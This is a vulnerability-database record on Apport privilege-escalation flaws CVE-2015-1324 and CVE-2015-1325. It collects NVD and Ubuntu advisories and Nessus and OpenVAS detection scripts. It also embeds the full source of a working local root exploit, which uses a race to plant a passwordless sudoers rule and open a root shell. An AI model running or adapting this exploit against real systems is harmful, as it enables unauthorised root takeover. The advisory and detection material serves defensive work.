{"id": "SECURITYVULNS:VULN:14395", "bulletinFamily": "software", "title": "Apport privilege escalation", "description": "Invalid crash report handling.", "published": "2015-04-17T00:00:00", "modified": "2015-04-17T00:00:00", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:14395", "reporter": "BUGTRAQ", "references": ["https://vulners.com/securityvulns/securityvulns:doc:31923"], "cvelist": ["CVE-2015-1325", "CVE-2015-1324"], "type": "securityvulns", "lastseen": "2018-08-31T11:10:00", "history": [], "edition": 1, "hashmap": [{"key": "affectedSoftware", "hash": "9e761924cb6f869fd7d13a2442a51c0d"}, {"key": "bulletinFamily", "hash": "f9fa10ba956cacf91d7878861139efb9"}, {"key": "cvelist", "hash": "aee7c7d3c4605f520e494bc4d4ae9901"}, {"key": "cvss", "hash": "cfd16da9581e0c21db590e40dfd9e493"}, {"key": "description", "hash": "789479909a628de9b921e92eef0bb9be"}, {"key": "href", "hash": "0db232ff2e79ecf1cf4942a513a84984"}, {"key": "modified", "hash": "e6695a6d07d6d88320479ddf417d77d7"}, {"key": "published", "hash": "e6695a6d07d6d88320479ddf417d77d7"}, {"key": "references", "hash": "3c0e04877854244cd31c637b647af5e4"}, {"key": "reporter", "hash": "2c5cca82a8670da097919f6160833daf"}, {"key": "title", "hash": "d34e176f4d9dbfba31bae9b24f77306c"}, {"key": "type", "hash": "d54751dd75af2ea0147b462b3e001cd0"}], "hash": "9eb080e2ad0dc08bef3b709f06f06e1e5b53f158d8456684c7d23e0263183c4e", "viewCount": 1, "enchantments": {"score": {"value": 5.0, "vector": "NONE", "modified": "2018-08-31T11:10:00"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2015-1325", "CVE-2015-1324"]}, {"type": "ubuntu", "idList": ["USN-2609-1"]}, {"type": "nessus", "idList": ["UBUNTU_USN-2609-1.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310842208"]}, {"type": "exploitdb", "idList": ["EDB-ID:37088"]}], "modified": "2018-08-31T11:10:00"}, "vulnersScore": 5.0}, "objectVersion": "1.3", "affectedSoftware": [{"name": "apport", "operator": "eq", "version": "2.14"}]}

{"cve": [{"lastseen": "2017-08-31T17:15:39", "bulletinFamily": "NVD", "description": "Race condition in Apport before 2.17.2-0ubuntu1.1 as packaged in Ubuntu 15.04, before 2.14.70ubuntu8.5 as packaged in Ubuntu 14.10, before 2.14.1-0ubuntu3.11 as packaged in Ubuntu 14.04 LTS, and before 2.0.1-0ubuntu17.9 as packaged in Ubuntu 12.04 LTS allow local users to write to arbitrary files and gain root privileges.", "modified": "2017-08-30T11:20:10", "published": "2017-08-25T14:29:00", "id": "CVE-2015-1325", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-1325", "type": "cve", "title": "CVE-2015-1325", "cvss": {"score": 6.9, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-08-31T17:15:39", "bulletinFamily": "NVD", "description": "Apport before 2.17.2-0ubuntu1.1 as packaged in Ubuntu 15.04, before 2.14.70ubuntu8.5 as packaged in Ubuntu 14.10, before 2.14.1-0ubuntu3.11 as packaged in Ubuntu 14.04 LTS, and before 2.0.1-0ubuntu17.9 as packaged in Ubuntu 12.04 LTS allow local users to write to arbitrary files and gain root privileges by leveraging incorrect handling of permissions when generating core dumps for setuid binaries.", "modified": "2017-08-30T11:54:07", "published": "2017-08-25T14:29:00", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-1324", "id": "CVE-2015-1324", "title": "CVE-2015-1324", "type": "cve", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "ubuntu": [{"lastseen": "2018-08-31T00:08:44", "bulletinFamily": "unix", "description": "Sander Bos discovered that Apport incorrectly handled permissions when the system was configured to generate core dumps for setuid binaries. A local attacker could use this issue to gain elevated privileges. (CVE-2015-1324)\n\nPhilip Pettersson discovered that Apport contained race conditions resulting core dumps to be generated with incorrect permissions in arbitrary locations. A local attacker could use this issue to gain elevated privileges. (CVE-2015-1325)", "modified": "2015-05-21T00:00:00", "published": "2015-05-21T00:00:00", "id": "USN-2609-1", "href": "https://usn.ubuntu.com/2609-1/", "title": "Apport vulnerabilities", "type": "ubuntu", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "nessus": [{"lastseen": "2019-02-21T01:24:15", "bulletinFamily": "scanner", "description": "Sander Bos discovered that Apport incorrectly handled permissions when the system was configured to generate core dumps for setuid binaries.\nA local attacker could use this issue to gain elevated privileges.\n(CVE-2015-1324)\n\nPhilip Pettersson discovered that Apport contained race conditions resulting core dumps to be generated with incorrect permissions in arbitrary locations. A local attacker could use this issue to gain elevated privileges. (CVE-2015-1325).\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Ubuntu security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "modified": "2018-12-01T00:00:00", "id": "UBUNTU_USN-2609-1.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=83777", "published": "2015-05-22T00:00:00", "title": "Ubuntu 12.04 LTS / 14.04 LTS / 14.10 / 15.04 : apport vulnerabilities (USN-2609-1)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-2609-1. The text \n# itself is copyright (C) Canonical, Inc. See \n# <http://www.ubuntu.com/usn/>. Ubuntu(R) is a registered \n# trademark of Canonical, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(83777);\n script_version(\"2.10\");\n script_cvs_date(\"Date: 2018/12/01 15:12:39\");\n\n script_cve_id(\"CVE-2015-1324\", \"CVE-2015-1325\");\n script_xref(name:\"USN\", value:\"2609-1\");\n\n script_name(english:\"Ubuntu 12.04 LTS / 14.04 LTS / 14.10 / 15.04 : apport vulnerabilities (USN-2609-1)\");\n script_summary(english:\"Checks dpkg output for updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Ubuntu host is missing a security-related patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Sander Bos discovered that Apport incorrectly handled permissions when\nthe system was configured to generate core dumps for setuid binaries.\nA local attacker could use this issue to gain elevated privileges.\n(CVE-2015-1324)\n\nPhilip Pettersson discovered that Apport contained race conditions\nresulting core dumps to be generated with incorrect permissions in\narbitrary locations. A local attacker could use this issue to gain\nelevated privileges. (CVE-2015-1325).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://usn.ubuntu.com/2609-1/\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected apport package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:apport\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:12.04:-:lts\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:14.04\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:14.10\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:15.04\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/05/21\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/05/22\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"Ubuntu Security Notice (C) 2015-2018 Canonical, Inc. / NASL script (C) 2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"ubuntu.inc\");\ninclude(\"misc_func.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/Ubuntu/release\");\nif ( isnull(release) ) audit(AUDIT_OS_NOT, \"Ubuntu\");\nrelease = chomp(release);\nif (! ereg(pattern:\"^(12\\.04|14\\.04|14\\.10|15\\.04)$\", string:release)) audit(AUDIT_OS_NOT, \"Ubuntu 12.04 / 14.04 / 14.10 / 15.04\", \"Ubuntu \" + release);\nif ( ! get_kb_item(\"Host/Debian/dpkg-l\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Ubuntu\", cpu);\n\nflag = 0;\n\nif (ubuntu_check(osver:\"12.04\", pkgname:\"apport\", pkgver:\"2.0.1-0ubuntu17.9\")) flag++;\nif (ubuntu_check(osver:\"14.04\", pkgname:\"apport\", pkgver:\"2.14.1-0ubuntu3.11\")) flag++;\nif (ubuntu_check(osver:\"14.10\", pkgname:\"apport\", pkgver:\"2.14.7-0ubuntu8.5\")) flag++;\nif (ubuntu_check(osver:\"15.04\", pkgname:\"apport\", pkgver:\"2.17.2-0ubuntu1.1\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"apport\");\n}\n", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "openvas": [{"lastseen": "2018-11-19T13:01:17", "bulletinFamily": "scanner", "description": "The remote host is missing an update for the ", "modified": "2018-11-16T00:00:00", "published": "2015-06-09T00:00:00", "id": "OPENVAS:1361412562310842208", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310842208", "title": "Ubuntu Update for apport USN-2609-1", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Ubuntu Update for apport USN-2609-1\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2015 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.842208\");\n script_version(\"$Revision: 12381 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-11-16 12:16:30 +0100 (Fri, 16 Nov 2018) $\");\n script_tag(name:\"creation_date\", value:\"2015-06-09 11:04:51 +0200 (Tue, 09 Jun 2015)\");\n script_cve_id(\"CVE-2015-1324\", \"CVE-2015-1325\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Ubuntu Update for apport USN-2609-1\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'apport'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"Sander Bos discovered that Apport\nincorrectly handled permissions when the system was configured to generate core\ndumps for setuid binaries. A local attacker could use this issue to gain elevated\nprivileges. (CVE-2015-1324)\n\nPhilip Pettersson discovered that Apport contained race conditions\nresulting core dumps to be generated with incorrect permissions in\narbitrary locations. A local attacker could use this issue to gain elevated\nprivileges. (CVE-2015-1325)\");\n script_tag(name:\"affected\", value:\"apport on Ubuntu 14.10,\n Ubuntu 14.04 LTS,\n Ubuntu 12.04 LTS\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n script_xref(name:\"USN\", value:\"2609-1\");\n script_xref(name:\"URL\", value:\"http://www.ubuntu.com/usn/usn-2609-1/\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2015 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\", re:\"ssh/login/release=UBUNTU(14\\.10|14\\.04 LTS|12\\.04 LTS)\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = dpkg_get_ssh_release();\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"UBUNTU14.10\")\n{\n\n if ((res = isdpkgvuln(pkg:\"apport\", ver:\"2.14.7-0ubuntu8.5\", rls:\"UBUNTU14.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n\n\nif(release == \"UBUNTU14.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"apport\", ver:\"2.14.1-0ubuntu3.11\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n\n\nif(release == \"UBUNTU12.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"apport\", ver:\"2.0.1-0ubuntu17.9\", rls:\"UBUNTU12.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "exploitdb": [{"lastseen": "2016-02-04T05:03:31", "bulletinFamily": "exploit", "description": "Apport/Ubuntu - Local Root Race Condition. CVE-2015-1325. Local exploit for linux platform", "modified": "2015-05-23T00:00:00", "published": "2015-05-23T00:00:00", "id": "EDB-ID:37088", "href": "https://www.exploit-db.com/exploits/37088/", "type": "exploitdb", "title": "Apport/Ubuntu - Local Root Race Condition", "sourceData": "/*\r\n# Exploit Title: apport/ubuntu local root race condition\r\n# Date: 2015-05-11\r\n# Exploit Author: rebel\r\n# Version: ubuntu 14.04, 14.10, 15.04\r\n# Tested on: ubuntu 14.04, 14.10, 15.04\r\n# CVE : CVE-2015-1325\r\n\r\n*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*\r\nCVE-2015-1325 / apport-pid-race.c\r\napport race conditions\r\n\r\nubuntu local root\r\ntested on ubuntu server 14.04, 14.10, 15.04\r\n\r\ncore dropping bug also works on older versions, but you can't\r\nwrite arbitrary contents. on 12.04 /etc/logrotate.d might work,\r\ndidn't check. sudo and cron will complain if you drop a real ELF\r\ncore file in sudoers.d/cron.d\r\n\r\nunpriv@ubuntu-1504:~$ gcc apport-race.c -o apport-race && ./apport-race\r\ncreated /var/crash/_bin_sleep.1002.crash\r\ncrasher: my pid is 1308\r\napport stopped, pid = 1309\r\ngetting pid 1308\r\ncurrent pid = 1307..2500..5000..7500..10000........\r\n** child: current pid = 1308\r\n** child: executing /bin/su\r\nPassword: sleeping 2s..\r\n\r\nchecker: mode 4532\r\nwaiting for file to be unlinked..writing to fifo\r\nfifo written.. wait...\r\nwaiting for /etc/sudoers.d/core to appear..\r\n\r\nchecker: new mode 32768 .. done\r\nchecker: SIGCONT\r\nchecker: writing core\r\nchecker: done\r\nsuccess\r\n# id\r\nuid=0(root) gid=0(root) groups=0(root)\r\n\r\n85ad63cf7248d7da46e55fa1b1c6fe01dea43749\r\n2015-05-10\r\n%rebel%\r\n*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*\r\n*/\r\n\r\n\r\n#include <stdio.h>\r\n#include <stdlib.h>\r\n#include <sys/types.h>\r\n#include <signal.h>\r\n#include <sys/mman.h>\r\n#include <sys/syscall.h>\r\n#include <sys/stat.h>\r\n#include <fcntl.h>\r\n#include <sys/resource.h>\r\n#include <unistd.h>\r\n#include <string.h>\r\n#include <sys/wait.h>\r\n\r\n\r\nchar *crash_report = \"ProblemType: Crash\\nArchitecture: amd64\\nCrashCounter: 0\\nDate: Sat May 9 18:18:33 2015\\nDistroRelease: Ubuntu 15.04\\nExecutablePath: /bin/sleep\\nExecutableTimestamp: 1415000653\\nProcCmdline: sleep 1337\\nProcCwd: /home/rebel\\nProcEnviron:\\n XDG_RUNTIME_DIR=<set>\\nProcMaps:\\n 00400000-00407000 r-xp 00000000 08:01 393307 /bin/sleep\\nProcStatus:\\n Name: sleep\\nSignal: 11\\nUname: Linux 3.19.0-15-generic x86_64\\nUserGroups:\\n_LogindSession: 23\\nCoreDump: base64\\n H4sICAAAAAAC/0NvcmVEdW1wAA==\\n U1ZgZGJm4eLicvTxUQBiWw0goang5x/gGBwc7mIFEuMCAA==\\n\";\r\n/*\r\nlast line is the stuff we write to the corefile\r\n\r\nc = zlib.compressobj(9,zlib.DEFLATED,-zlib.MAX_WBITS)\r\nt = '# \\x01\\x02\\x03\\x04\\n\\n\\nALL ALL=(ALL) NOPASSWD: ALL\\n'\r\n# need some non-ASCII bytes so it doesn't turn into a str()\r\n# which makes apport fail with the following error:\r\n# os.write(core_file, r['CoreDump'])\r\n# TypeError: 'str' does not support the buffer interface\r\nt = bytes(t,'latin1')\r\nc.compress(t)\r\na = c.flush()\r\nimport base64\r\nbase64.b64encode(a)\r\n\r\n# b'U1ZgZGJm4eLicvTxUQBiWw0goang5x/gGBwc7mIFEuMCAA=='\r\n*/\r\n\r\nint apport_pid;\r\nchar report[128];\r\n\r\nvoid steal_pid(int wanted_pid)\r\n{\r\n int x, pid;\r\n\r\n pid = getpid();\r\n\r\n fprintf(stderr,\"getting pid %d\\n\", wanted_pid);\r\n fprintf(stderr,\"current pid = %d..\", pid);\r\n\r\n for(x = 0; x < 500000; x++) {\r\n pid = fork();\r\n if(pid == 0) {\r\n pid = getpid();\r\n if(pid % 2500 == 0)\r\n fprintf(stderr,\"%d..\", pid);\r\n\r\n if(pid == wanted_pid) {\r\n fprintf(stderr,\"\\n** child: current pid = %d\\n\", pid);\r\n fprintf(stderr,\"** child: executing /bin/su\\n\");\r\n\r\n execl(\"/bin/su\", \"su\", NULL);\r\n }\r\n exit(0);\r\n return;\r\n }\r\n if(pid == wanted_pid)\r\n return;\r\n\r\n wait(NULL);\r\n }\r\n\r\n}\r\n\r\n\r\n\r\nvoid checker(void)\r\n{\r\n struct stat s;\r\n int fd, mode, x;\r\n\r\n stat(report, &s);\r\n\r\n fprintf(stderr,\"\\nchecker: mode %d\\nwaiting for file to be unlinked..\", s.st_mode);\r\n\r\n mode = s.st_mode;\r\n\r\n while(1) {\r\n// poor man's pseudo-singlestepping\r\n kill(apport_pid, SIGCONT);\r\n kill(apport_pid, SIGSTOP);\r\n\r\n// need to wait a bit for the signals to be handled,\r\n// otherwise we'll miss when the new report file is created\r\n for(x = 0; x < 100000; x++);\r\n\r\n stat(report, &s);\r\n\r\n if(s.st_mode != mode)\r\n break;\r\n }\r\n\r\n fprintf(stderr,\"\\nchecker: new mode %d .. done\\n\", s.st_mode);\r\n\r\n unlink(report);\r\n mknod(report, S_IFIFO | 0666, 0);\r\n\r\n fprintf(stderr,\"checker: SIGCONT\\n\");\r\n kill(apport_pid, SIGCONT);\r\n\r\n fprintf(stderr,\"checker: writing core\\n\");\r\n\r\n fd = open(report, O_WRONLY);\r\n write(fd, crash_report, strlen(crash_report));\r\n close(fd);\r\n fprintf(stderr,\"checker: done\\n\");\r\n\r\n while(1)\r\n sleep(1);\r\n}\r\n\r\n\r\n\r\nvoid crasher()\r\n{\r\n chdir(\"/etc/sudoers.d\");\r\n\r\n fprintf(stderr,\"crasher: my pid is %d\\n\", getpid());\r\n\r\n execl(\"/bin/sleep\", \"sleep\", \"1337\", NULL);\r\n\r\n exit(0);\r\n}\r\n\r\n\r\nint main(void)\r\n{\r\n int pid, checker_pid, fd;\r\n struct rlimit limits;\r\n struct stat s;\r\n\r\n limits.rlim_cur = RLIM_INFINITY;\r\n limits.rlim_max = RLIM_INFINITY;\r\n setrlimit(RLIMIT_CORE, &limits);\r\n\r\n pid = fork();\r\n\r\n if(pid == 0)\r\n crasher();\r\n\r\n sprintf(report, \"/var/crash/_bin_sleep.%d.crash\", getuid());\r\n\r\n unlink(report);\r\n mknod(report, S_IFIFO | 0666, 0);\r\n\r\n fprintf(stderr,\"created %s\\n\", report);\r\n\r\n usleep(300000);\r\n kill(pid, 11);\r\n apport_pid = pid + 1;\r\n// could check that pid+1 is actually apport here but it's\r\n// kind of likely\r\n fprintf(stderr,\"apport stopped, pid = %d\\n\", apport_pid);\r\n\r\n usleep(300000);\r\n\r\n kill(pid, 9);\r\n steal_pid(pid);\r\n sleep(1);\r\n\r\n kill(apport_pid, SIGSTOP);\r\n\r\n checker_pid = fork();\r\n\r\n if(checker_pid == 0) {\r\n checker();\r\n exit(0);\r\n }\r\n\r\n fprintf(stderr,\"sleeping 2s..\\n\");\r\n sleep(2);\r\n\r\n fprintf(stderr,\"writing to fifo\\n\");\r\n\r\n fd = open(report, O_WRONLY);\r\n write(fd, crash_report, strlen(crash_report));\r\n close(fd);\r\n\r\n fprintf(stderr,\"fifo written.. wait...\\n\");\r\n fprintf(stderr,\"waiting for /etc/sudoers.d/core to appear..\\n\");\r\n\r\n while(1) {\r\n stat(\"/etc/sudoers.d/core\", &s);\r\n if(s.st_size == 37)\r\n break;\r\n usleep(100000);\r\n }\r\n\r\n fprintf(stderr,\"success\\n\");\r\n kill(pid, 9);\r\n kill(checker_pid, 9);\r\n return system(\"sudo -- sh -c 'stty echo;sh -i'\");\r\n}\r\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://www.exploit-db.com/download/37088/"}]}